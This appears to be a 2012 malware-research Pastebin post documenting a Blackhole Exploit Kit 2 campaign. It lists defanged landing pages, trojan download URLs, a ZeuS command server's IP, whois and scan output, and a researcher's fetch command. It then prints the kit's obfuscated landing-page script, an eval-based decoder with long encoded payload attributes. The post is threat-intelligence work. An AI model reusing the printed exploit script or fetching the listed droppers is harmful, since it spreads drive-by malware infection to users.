API tools faq
paste
Advertisement
MalwareMustDie

#w00t! Large Infection BHEK2 Dropped Multiple Trojan/ZeuS!

MalwareMustDie
Oct 27th, 2012
1,952
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 74.04 KB | None | 0 0
raw download clone embed print report
  1. =====================================================
  2. #MalwareMustDie!!!!!!!!!!!! | Sat Oct 27 18:29:21 JST 2012
  3. FreeBSD unixfreaxjp 9.0-RELEASE-p4 FreeBSD 9.0-RELEASE-p4 #
  4.  
  5. This is the large infection of BHEK2 hinted by @xxxxrxero followed by @unixfreaxjp
  6. Hit by MDAC Exploit Infection & Downloaded the Trojan, Backdoor, Encrypt, Downloader 03ab326.exe' saved [256784/256784]
  7. I am pretty sure this one as ZeuS, since Detection Ratio of VT still too low.
  8. url: h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
  9. Also drops other troj: h00p://4.icedambusters.com/adobe/update_flash_player.exe
  10. Referer are to: 74.200.211.205
  11. CNC: 198.143.159.66
  12. After infected by 03ab326.exe it also dwonloaded THREE MORE TROJANS from:
  13. h00p://springbackcolorado.com/CaBPXFg.exe
  14. h00p://180degrees.org.nz/cXbAC.exe
  15. h00p://weareseasons.com/7yoZf5.exe
  16. PluginDetect VT(5/44): h00ps://www.virustotal.com/file/ebf5a59e4f7212cca87a6b6bf9d646189674f40c3d0f765a2adf62b9ba0a9ca4/analysis/1351330706/
  17. Troj Downloader VT(8/44): h00ps://www.virustotal.com/file/94258a10d190c941b697246453974bd892f63c77880073674ee1759fa550f5b8/analysis/1351330579/
  18. The Trojan Zbot(Main) VT(4/44): h00ps://www.virustotal.com/file/166c1a35cf4f24e3678ad0d2c863b95d8a49448915bfcf31eccb5412d9b1ca8e/analysis/1351330452/
  19. ======================================================
  20.  
  21. ========================
  22. INFECTIONS SCHEME
  23. ========================
  24.  
  25. #include Hint: HINT.TXT;
  26. ---------------------------------------------------------------------------------------------------------------------------...
  27. LANDING PAGE JS.JS PLUGIN DETECT OBFS
  28. ---------------------------------------------------------------------------------------------------------------------------...
  29. h00p://50.63.137.176/8jorLtGh/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  30. h00p://a1stopshop.in/DAE4v3m/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  31. h00p://acura.hightestonline.com/2cE8GLPY/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  32. h00p://agriculturaenmarcha.com/5tNBJdC/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  33. h00p://blt-photography.com/9UEazEmw/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  34. h00p://cefoai.com/9TFzUf/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  35. h00p://churchjef.com/3Mn4rs/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  36. h00p://elefti.com/4yxcpfn/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  37. h00p://estoesxicotepec.com.mx/1dKmuBp8/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  38. h00p://financialportal.co.za/1G6V26b/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  39. h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  40. h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://kocaudio.com/yaxF05nC/js.js | h00p://srv.michigancrotchrockets.com/links/return-west.php |
  41. h00p://gurkan.bae.com.tr/35WrzC/index.html | h00p://agritech.com.ve/MtkRFd3k/js.js | h00p://srv.michigancrotchrockets.com/links/return-west.php |
  42. h00p://infotrex.com/bq9MGi/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  43. h00p://interambiente.altervista.org/88DTb1S7/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  44. h00p://littlecreekinc.com/9LAfwJz/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  45. h00p://motosikletsasesi.com/11qX8KCB/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  46. h00p://netguandisenoweb.com/1fp3PP/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  47. h00p://new.artofimagination.com/5dLS24/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  48. h00p://oneryavuz.com/abMBVR/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  49. h00p://optikcim.com/5RRvjA8/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  50. h00p://ortizplans.com/43wKes/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  51. h00p://pose-frette.gmxhome.de/66jzk4q/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  52. h00p://potter.com.hk/6UTxen/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  53. h00p://rajiv.stealbackyourppcprofits.com/AtdNGGH/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  54. h00p://rapblast.com/Af1Msc/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  55. h00p://safeguardlcs.com/M90nh9/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  56. h00p://sanypet.it/7hKxQao/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  57. h00p://southsnetball.asn.au/21drY7/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  58. h00p://superiorshine-carwash.com/5M2M4Mh/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  59. h00p://testsites1.com/9bMNvy/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  60. h00p://trailblazers.org/8AvgUm/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  61. h00p://tranzzactn.com/075V7po/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  62. h00p://ventanasdesanmiguel.net/3ADRuw/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  63. h00p://www.alicil.com/0yUWvU/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  64. h00p://www.emiliacenterdownload.com/3p9rovT/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  65. h00p://www.jonespark.com/46YdTk/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  66. h00p://www.prettyleg.idv.tw/dvYhPu/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  67. h00p://www.rosesocietyjbp.com/1xt74Jy1/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  68. h00p://yesilhoca.com/09DFUG7F/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  69. h00p://zalesie-gorne.home.pl/0qU3MX/index.html | h00p://74.200.211.205/SQeyUUzT/js.js | h00p://ser.luckypetspetsitting.com/links/return-west.php |
  70.  
  71.  
  72. ==================================
  73. INFECTOR DETAILS;
  74.  
  75. 74.200.211.205
  76. ==================================
  77. NetRange: 74.200.192.0 - 74.200.255.255
  78. CIDR: 74.200.192.0/18
  79. OriginAS: AS16805, AS22576
  80. NetName: LAYERED-TECH-CHI
  81. NetHandle: NET-74-200-192-0-1
  82. Parent: NET-74-0-0-0-0
  83. NetType: Direct Allocation
  84. RegDate: 2006-11-14
  85. Updated: 2012-02-24
  86. Ref: h00p://whois.arin.net/rest/net/NET-74-200-192-0-1
  87.  
  88.  
  89. OrgName: Layered Technologies, Inc.
  90. OrgId: LAYER-3
  91. Address: 5085 W Park Blvd
  92. Address: Suite 700
  93. City: Plano
  94. StateProv: TX
  95. PostalCode: 75093
  96. Country: US
  97. RegDate: 2004-07-21
  98. Updated: 2010-08-13
  99. Comment: Please send all abuse complaints to abuse@layeredtech.com
  100. Ref: h00p://whois.arin.net/rest/org/LAYER-3
  101.  
  102. PORT STATE SERVICE
  103. 21/tcp open ftp
  104. 25/tcp open smtp
  105. 26/tcp closed unknown
  106. 53/tcp open domain
  107. 80/tcp open h00p
  108. 110/tcp open pop3
  109. 143/tcp closed imap
  110. 443/tcp open h00ps
  111. 587/tcp open submission
  112. 993/tcp closed imaps
  113. 995/tcp closed pop3s
  114. No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
  115. TCP/IP fingerprint:
  116. SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B9336%O=21%C=26)
  117. TSeq(Class=TR%IPID=I%TS=0)
  118. T1(Resp=Y%DF=N%W=4000%ACK=S++%Flags=AS%Ops=MNWNNT)
  119. T2(Resp=N)
  120. T3(Resp=N)
  121. T4(Resp=N)
  122. T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
  123. T6(Resp=N)
  124. T7(Resp=N)
  125. PU(Resp=N)
  126.  
  127. ==================================
  128. CNC / CONTROL DETAILS;
  129.  
  130. IP: 198.143.159.66
  131. ==================================
  132.  
  133. IP: 198.143.159.66
  134.  
  135. NetRange: 198.143.128.0 - 198.143.191.255
  136. CIDR: 198.143.128.0/18
  137. OriginAS: AS32475
  138. NetName: SINGLEHOP
  139. NetHandle: NET-198-143-128-0-1
  140. Parent: NET-198-0-0-0-0
  141. NetType: Direct Allocation
  142. RegDate: 2012-05-16
  143. Updated: 2012-05-16
  144. Ref: h00p://whois.arin.net/rest/net/NET-198-143-128-0-1
  145.  
  146.  
  147. OrgName: SingleHop, Inc.
  148. OrgId: SINGL-8
  149. Address: 621 W. Randolph St.
  150. Address: 3rd Floor
  151. City: Chicago
  152. StateProv: IL
  153. PostalCode: 60661
  154. Country: US
  155. RegDate: 2007-03-07
  156. Updated: 2010-03-23
  157. Comment: h00p://www.singlehop.com/
  158. Ref: h00p://whois.arin.net/rest/org/SINGL-8
  159.  
  160.  
  161. PORT STATE SERVICE
  162. 22/tcp open ssh
  163. 80/tcp open h00p
  164. 135/tcp filtered msrpc
  165. 136/tcp filtered profile
  166. 137/tcp filtered netbios-ns
  167. 138/tcp filtered netbios-dgm
  168. 139/tcp filtered netbios-ssn
  169. 445/tcp filtered microsoft-ds
  170. No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
  171. TCP/IP fingerprint:
  172. SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B94D1%O=22%C=1)
  173. TSeq(Class=TR%IPID=Z%TS=1000HZ)
  174. T1(Resp=Y%DF=Y%W=3890%ACK=S++%Flags=AS%Ops=MNNTNW)
  175. T2(Resp=N)
  176. T3(Resp=N)
  177. T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
  178. T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
  179. T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
  180. T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
  181. PU(Resp=Y%DF=N%TOS=0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
  182.  
  183.  
  184. ============================================
  185. Grab the pluginDetect & you get the CNC!
  186. ============================================
  187. $ myfetch --h00p_proxy=yes
  188. --user-agent="Mozila/4.3(X11; U; MacOSX)"
  189. --cookies=on --keep-session-cookies --save-cookies mycookies.txt
  190. --referer="h00p://74.200.211.205/SQeyUUzT/js.js" "
  191. --target="h00p://ser.luckypetspetsitting.com/links/return-west.php"
  192.  
  193. // w/tor
  194. --16:21:02-- h00p://ser.luckypetspetsitting.com/links/return-west.php
  195. => `return-west.php'
  196. Connecting to 192.168.7.11:8118... connected.
  197. Proxy request sent, awaiting response... 502 Bad Gateway
  198. 16:21:14 ERROR 502: Bad Gateway.
  199.  
  200. // gatling IP
  201. --16:21:34-- h00p://ser.luckypetspetsitting.com/links/return-west.php
  202. => `return-west.php'
  203. Resolving ser.luckypetspetsitting.com... 198.143.159.66
  204. Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
  205. h00p request sent, awaiting response... 200 OK
  206. Length: unspecified [text/html]
  207. 16:21:37 (131.58 KB/s) - `return-west.php' saved [28878]
  208.  
  209. ============================
  210. DECODING ANALYSIS
  211. ===========================
  212.  
  213. //Wepawet OK, jsunpack BAD, Malzilla OK, Revello BAD, SteamDumper OK
  214.  
  215. <html><head><title></title></head><body><div dqa="asd"></div><script>p=eval("p"+"arseInt");function asd(){return document.getElementsByTagName("span")[0];}function asd2(){return q.getAttribute(i);}function asd3(){a+=String.fromCharCode(p(s.substr(i,2),24));}function asd4(){eval(a);}zxc=(020==0x10);</script><span 34="1k431m48(414e444c45@4i1g431m4i&4l4e3f3446+4l4e434j1k%431h1h551k)494e494k2a#464l4e434k*494f4e1g44!1h534m414i^18432d4k48_494j1k421k$441k412d53(4j4k414k4l@4j2a1l231k&4g4c4l4749+4e2a20552b%49461g1943)1m494j3b4k#4i494e471g*441h1h534i!454k4l4i4e^1841554946_1g441m4c45$4e474k482d(2d211h5343@1m47454k3e&454i4" 80="2d#1a291a5545*4c4j455349!461g471m4g^4c4l47494e_30414j3549$4d453c514g(451g421k1a@414g4g4c49&43414k494f+4e1n4m4e44%1m41444f42)451m501l4d#414i4j1a1k*411h1h5348!2d1a281a55^5555555545_4c4j455348$2d471m4m45(4i4j494f4e@5549461g19&441m494j2k+4546494e45%441g4e1h1h)534e2d441m#47454k3549*4d452l4e41!424c454438^" 42="555541&1m434c4541+4e4l4g1g1h%2b422d1g46)1m4m454i4j#494f4e5454*461m4m454i!4j494f4e20^1h2b422d42_2f421m4i45$4g4c414345(1g411m4j4g@4c494k364l&4d3a454750+1k411m4745%4k3e454i4j)494f4e2k45#4c494d494k*454i1h2a42!2b4i454k4l^4i4e184255_551k434c45$414e4l4g2a(464l4e434k@494f4e1g1h&53551k4144+443f494e2l%4m454e4" 55="!4454541943^1m47454k2k_37354f424a$1g4d1h1h53(4i454k4l4i@4e181l2255&49461g4a2c+4954544c2c%2054544a2c)205454492c#205454492c*2d431m4g4c!4l47494e3b^4952455454_431m4g4c4l$47494e3b49(52452c211h@534i454k4l&4i4e182055+49461g4c2e%2d491h534i)454k4l4i4e#181l21554k*4i51534946!1g4c2d2d43^1m4g4c4l47_494e3b4952$45" 79="54j43+4i494g4k49%4f4e1h5454)441m47454k#364l4d1g42*1m4e414d45!1h2b482d44^1m47454k38_4c4l47494e$2m494c453e(454i4j494f@4e1g421k48&1h2b49461g+19481e1e44%1m373b2d2d)211h534946#1g471m4g4c*4l47494e30!414j35494d^453c514g45_1g421k1a41$4g4g4c4943(414k494f4e@1n4m4e441m&41444f4245+1m4g444650%4d4c1a1k41)1h1h5348" 89="421m4j4k(4i1a1k1a45@414d1a1h1k&1a1a1h1k4i+41212d4i41%231m2j4i45)414k453742#4a45434k1g*1a3b48454c!4c1m2h4g4g^4c4943414k_494f4e1a1k$1a1a1h1k4i(41222d4i41@231m2j4i45&414k453742+4a45434k1g%1a4d4j504d)4c221m3g35#34303c3c38*1a1k1a1a1h!2b4k4i5153^4i41221m4f_4g454e1g1a$2n2l3c1a1k(1a484k4k4g@2a1n1n4j45&4i1m4" 44="!482l4m454e^4k1g1a4f4e_1a1j441k43$1h55454c4j(4553422d41@3j1a4f4e1a&1j443l2b41+3j1a4f4e1a%1j443l2d45)1m4n494e30#414e444c45*4i1g431k42!1h55555555^1k4n494e30_414e444c45$4i2a464l4e(434k494f4e@1g441k431h&534i454k4l+4i4e18464l%4e434k494f)4e1g1h5344#1g1h2b4946*1g4k514g45!4f4618432d^2d1a464l4e_434k494f4e$1a" 69="1j#231h1j1a4g*501a1k1a4c!494e453045^4947484k1a_1k1g4b1m4g$4c4l47494e(3b4952451j@231h1j1a4g&501a1k1a4m+454i4k4943%414c2h4c49)474e1a1k1a#42414j454c*494e451a1k!1a44494j4g^4c41511a1k_1a424c4f43$4b1a3l1h1h(2b49461g19@4a1h534b1m&4j454k3b4k+514c451g4b%1m44494m1k)3j1a4g4f4j#494k494f4e*1a1k1a4142!4j4f4c4l4k^" 60="l4d454e@4k1k432d1a&2c1a1k472d+1g4a1m4745%4k2l4c454d)454e4k4j2i#513c414736*414d451g1a!424f44511a^1h3j203l54_544a1m424f$44511h2b49(461g19471h@534k4i5153&4a1m4n4i49+4k451g431j%1f44494m18)49442d1a1f#1j421j1f1a*2e4f1f1j43!1j1a1n4449^4m2e1a1h2b_442d4a1m47$454k2l4c45(4d454e4k2i@5131441g42&1h5543414k+43481g" 8="f4e43414k$1g3j1a201a(1k1a201a1k@1a201a1k1a&201a3l1h2b+464f4i1g41%2d202b412c)242b411j1j#1h5349461g*1n3m1g201j!1h1g1m1j1h^1c1n1m4k45_4j4k1g453j$413l1h1h53(453j413l2d@3a45472l50&4g1m1c2255+49461g412e%435454191g)1n3k441n1h#1m4k454j4k*1g453j413l!1h1h53453j^413l2d1a20_1a55554i45$4k4l4i4e18(451m4j4c49@4345" 6="4d3a%4547501h2b)464f4i1g41#2d202b412c*35414k481m!4d494e1g43^1m4c454e47_4k481k421m$4c454e474k(481h2b411j@1j1h534946&1g471g433j+413l1k2120%1h2e471g42)3j413l1k21#201h1h534i*454k4l4i4e!1821554946^1g471g433j_413l1k2120$1h2c471g42(3j413l1k21@201h1h534i&454k4l4i4e+181l215555%554i454k4l)4i4e182055#1k464f4i4" 28="1a35%4j504d4c22)1m2k37352k#4f434l4d45*4e4k1a1k1a!3549434i4f^4j4f464k1m_3g35342k37$351a1k1a3b(484f434b4n@414m452m4c&414j481m3b+484f434b4n%414m452m4c)414j481a1k#1a3c2k2j2j*4k4c1m3c2k!2j2j4k4c1a^1k1a3b4845_4c4c1m3d31$30454c4g45(4i1a1k1a3b@434i494g4k&494e471m2k+49434k494f%4e414i511a)1k1a4n4d4g#4c4151454" 85="34g44464m$454i2d4g44(464m454i1m@4j4g4c494k&1g1f1m1f1h+55454c4j45%534g44464m)454i2d3j20#1k201k201k*203l55464l!4e434k494f^4e18501g4j_1h53442d3j$3l2b464f4i(1g492d202b@492c4j1m4c&454e474k48+2b491j1j1h%534b2d1g4j)1m4348414i#2j4f44452h*4k1g491h1l!24261h1m4k^4f3b4k4i49_4e471g2126$1h2b49461g(4b1m4c454e@474k" 35="j494f+4e2k454c49%4d494k454i)2d442b4i45#4k4l4i4e18*4155442d44!1m4k4f344f^4n454i2j41_4j451g1h1m$4i454g4c41(43451g1n3k@4j1n471k1a&1a1h2b422d+431m384c4l%47494e4j3j)443l2b4946#1g19425454*19421m4745!4k3e454i4j^494f4e1h53_4i454k4l4i$4e18415541(1m4g4c4l47@494e2d422b&49461g1943+1m494j2k45%46494e4544)1g421m49" 10="c44)1m4c454e47#4k482b421j*1j1h534946!1g411m494j^3b4k4i494e_471g443j42$3l1h1e1e1n(3j3m3k4j3l@1n1m4k454j&4k1g443j42+3l1h1h5346%2d4e414m49)47414k4f4i#1m4d494d45*3c514g454j!3j443j423l^3l2b452d46_2f461m454e$41424c4544(384c4l4749@4e2a202b49&461g451e1e+1g451m4e41%4d45545445)1m44454j43#4i494g4k49*4f4e1h1h53" 16="11h1h53@49461g1947&5454191g47+1m4k454j4k%1g4c1h5454)471m4k454j#4k1g411h1h*1h534i454k!4l4i4e1846^555555554i_454k4l4i4e$1820551k47(454k384c4l@47494e2m49&4c453e454i+4j494f4e2a%464l4e434k)494f4e1g46#1k421h534m*414i18482d!4k48494j1k^451k441k47_1k411k432d$1l212b4946(1g481m373b@2e22545419&4654541946+1m4m45" 78="494d452l(4e41424c45@44384c4l47&494e1g471m+4d494d453c%514g451k41)1h2b49461g#194a1h534e*2d42554946!1g19421e1e^441m48414j_35494d453c$514g451g47(1m4d494d45@3c514g451h&1h53422d44+1m46494e44%36414m384c)4l47494e1g#411k201h55*49461g421h!53471m4e41^4m384c4l47_494e37424a$2d422b482d(441m47454k@364l4d1g42&1m444" 52="j413l2b49$461g421e1e(421m464l4e@434j1h5349&461g421m37+3c2m2d2d23%1h534i454k)4l4i4e5549#461g421m46*4l4e434j1m!4c454e474k^481e1e421m_464l4e434j$3j421m464l(4e434j1m4c@454e474k48&1l213l192d+2d4e4l4c4c%1h534i454k)4l4i4e5555#55464f4i1g*412d202b41!2c431m2k37^362l464l4e_434j1m4c45$4e474k482b(411j1j1h53@431m" 36="4e#4j4k414c4c*45441h1h53!421m494e4j^4k414c4c45_442d4e4l4c$4c2b421m4m(454i4j494f@4e2d4e4l4c&4c2b421m4m+454i4j494f%4e202d4e4l)4c4c2b421m#47454k3e45*4i4j494f4e!2k4f4e452d^4e4l4c4c2b_421m4g4c4l$47494e3641(4d452d4455@431m47414i&424147452d+46414c4j45%2b49461g43)1m494j312l#1e1e19431m*2h434k494m!453g2l4e41^" 49="4364f44@454j3j483l&2b4k4i5153+431m4i454d%4f4m452j48)494c441g47#1h5543414k*43481g461h!5355555549^461g431h53_4k4i515344$1m44494m1m(4i454d4f4m@452j48494c&441g431h55+43414k4348%1g461h5355)5555554946#1g19441m44*494m1h5341!2d444f434l^4d454e4k1m_47454k2l4c$454d454e4k(2i5131441g@441m44494m&312k1h2b49+461g41" 70="451a1k1a4i_4947484k1a$1k1a204g50(1a1k1a4k4f@4g1a1k1a20&4g501a3l1h+2b4b1m494e%4j454i4k2k)494m314e2i#4f44511g4b*1m44494m1h!555549461g^4b1m44494m_1e1e4b1m44$494m1m4g41(4i454e4k36@4f44451h53&4b1m4j454k+3b4k514c45%1g4g1k431m)434f4e4341#4k1g3j1a46*4f4e4k3b49!52451a1k1g^4b1m4g4c4l_47494e3b49$52451j231h(1j1" 1="4e184k51(4g454f4618@42192d1a4l&4e44454649+4e45441a55%1k494j2h4i)4i41512a46#4l4e434k49*4f4e1g421h!534i454k4l^4i4e1g1n41_4i4i41511n$491h1m4k45(4j4k1g3742@4a45434k1m&4g4i4f4k4f+4k514g451m%4k4f3b4k4i)494e471m43#414c4c1g42*1h1h551k49!4j2m4l4e43^2a464l4e43_4k494f4e1g$421h534i45(4k4l4i4e18@4k514g454f&46184" 30="g491h2b43$1m4m454i2n(45434b4f2d@431m494j2n&45434b4f2f+431m464f4i%4d414k364l)4d1g1g1n4i#4m3k4j1i3k*2a3k4j1i1g!3j3k1m3k1k^3k443l1j1h_1n491h1m4k$454j4k1g49(1h2f3a4547@2l504g1m1c&212a1a201m+291a1h2a4e%4l4c4c2b43)1m494j2j48#4i4f4d452d*1g1n2j484i!4f4d453k4j^1i3k1n3k4j_1i1g3k443j$3k443k1m3l(1i1h1n491h@1m4k" 31="454j4k&1g491h2b43+1m4m454i2j%484i4f4d45)2d431m494j#2j484i4f4d*452f431m46!4f4i4d414k^364l4d1g3a_45472l504g$1m1c211h2a(4e4l4c4c2b@431m494j3b&4146414i49+2d1g1g1n2h%4g4g4c451n)491h1m4k45#4j4k1g471h*54541g1947!1e1e19431m^494j2j484i_4f4d451h1h$1e1e1g1n3b(4146414i49@3k4j1i3k1n&3k4j1i1g3k+443j3k443k%1m3l1i1" 22="!1g431k421h^555555551k_494e494k3b$434i494g4k(2a464l4e43@4k494f4e1g&1h534m414i+18432d4k48%494j1k412d)4e414m4947#414k4f4i1k*452d1a1n1a!1k461k492d^411m4l4j45_4i2h47454e$4k54541a1a(1k472d411m@4m454e444f&4i54541a1a+1k422d411m%4g4c414k46)4f4i4d5454#1a1a1k482d*411m4g4i4f!444l434k54^541a1a2b43_1m494e494k$37" 53="43414c&4c2h4i4i41+511g431m2k%37362l464l)4e434j1h55#431m454d4g*4k512k494m!1g1h551k47^454k3f4944_4k482a464l$4e434k494f(4e1g431h53@49461g431h&534m414i18+412d431m4j%434i4f4c4c)3f49444k48#5454431m4f*46464j454k!3f49444k48^1k422d4k48_494j2b4946$1g421m494j(364l4d1g41@1h1h534i45&4k4l4i4e18+4155554i45%4k4l4i4" 77="!1g19441m49^4j312l1h53_412d1a2h44$4f42451m1i(382k2m1m1i@384c4l471l&2f494e542h+444f42451m%1i2h434i4f)42414k1m1i#384c4l471l*2f494e542h!444f42451m^1i3a454144_454i1m1i38$4c4l471l2f(494e1a2b49@461g471m47&454k3e454i+4j494f4e2k%4f4e45192d)2d201h5347#1m47454k3e*454i4j494f!4e2k4f4e45^2d202b422d_441m47454k$35" 33="!3k1m2f3k44^1i1h1n491h_1m4k454j4k$1g491h2b43(1m4m454i37@4g454i412d&431m494j37+4g454i411e%1e1g1g1n3e)454i4j494f#4e3k4j1i3k*1n3k4j1i1g!3k441j3k1m^2f3k441i1h_1n491h1m4k$454j4k1g49(1h5454211h@2f4g414i4j&452m4c4f41+4k1g3a4547%2l504g1m1c)211k21201h#2a4e4l4c4c*2b431m4144!443f494e2l^4m454e4k1g_1a4c4f4144$1a" 86="482d2d&211h4b2d1a+201a1j4b2b%441m4g4l4j)481g4b1h2b#552b4i454k*4l4i4e1844!1m4a4f494e^1g1a1a1h2b_55454e443n$4i4544494i(45434k2d46@4l4e434k49&4f4e1g1h53+4n494e444f%4n1m4c4f43)414k494f4e#1m484i4546*2d1f484k4k!4g2a1n1n24^1m49434544_414d424l4j$4k454i4j1m(434f4d1n41@444f42451n&4l4g44414k+453n464c41%4j483n4" 84="7*494e2k454k!45434k1m49^4e494k3b43_4i494g4k1g$1h2b384c4l(47494e2k45@4k45434k1m&47454k3e45+4i4j494f4e%1g1a1m1a1h)2b4g44464m#454i2d384c*4l47494e2k!454k45434k^1m47454k3e_454i4j494f$4e1g1a2h44(4f42453a45@4144454i1a&1h2b554341+4k43481g45%1h53554946)1g4k514g45#4f46184g44*464m454i2d!2d1f4j4k4i^494e471f1h_5" 82="62d1g42@5454441m47&454k2k3735+4f424a1g44%1m494e4j45)4i4k303c35#341g1a4f42*4a45434k1a!1k3j1a434c^414j4j4944_1a1k471m43$4c414j4j31(2k3l1k3j1a@4j4i431a1k&1a1a3l1k1a+1a1k471h1h%1h1m2n454k)3e454i4j49#4f4e4j1g1h*2b464f4i1g!4d2d202b4d^2c252b4d1j_1j1h534946$1g431m4k45(4j4k1g461h@1e1e1g1948&54543a4547+2l504g" 50="1h53%441m44494m)2d41555549#461g441m44*494m1e1e44!1m44494m1m^4g414i454e_4k364f4445$1h534k4i51(53441m4449@4m1m4g414i&454e4k364f+44451m4i45%4d4f4m452j)48494c441g#441m44494m*1h5543414k!43481g461h^5355441m44_494m2d4e4l$4c4c55551k(2k37362l46@4l4e434j2a&3j3l1k4f4e+2k4f4e452l%4d4g4k512k)494m2a464l#4e434k494" 47="42#1k411m3f34*464l4e434j!1h5555551k^44494m2a4e_4l4c4c1k44$494m312k2a(1a4g4c4l47@494e44454k&45434k1a1k+44494m3f49%444k482a25)201k4g4c4l#47494e3b49*52452a211k!454d4g4k51^2k494m2a46_4l4e434k49$4f4e1g1h53(4m414i1844@2d4k48494j&1k421k481k+431k411k46%1k472b4946)1g441m4449#4m1e1e441m*44494m1m43!48494c4436^" 58="1e#411h53441m*44494m1m46!4f434l4j1g^1h55554341_4k43481g46$1h53554i45(4k4l4i4e18@422f431m46&494i4j4k2j+48494c442a%4e4l4c4c55)1k4j454k3b#4k514c452a*464l4e434k!494f4e1g42^1k471h534m_414i18462d$421m4j4k51(4c451k411k@441k432d4k&48494j2b49+461g461e1e%471h53464f)4i1g412d20#2b412c471m*4c454e474k!482b412d41^" 57="l4e4k+2d42554946%1g421l4d1m)434f4l4e4k#2e2d21201h*534i454k4l!4i4e182155^5555554341_4k43481g46$1h53554i45(4k4l4i4e18@20551k4745&4k2k37354f+424a2a464l%4e434k494f)4e1g471k41#1h534m414i*18461k442d!4k48494j1k^432d472f47_1m4j4g414e$2a201k422d(431e1e431m@46494i4j4k&2j48494c44+2f212a202b%4k4i515349)461g421e" 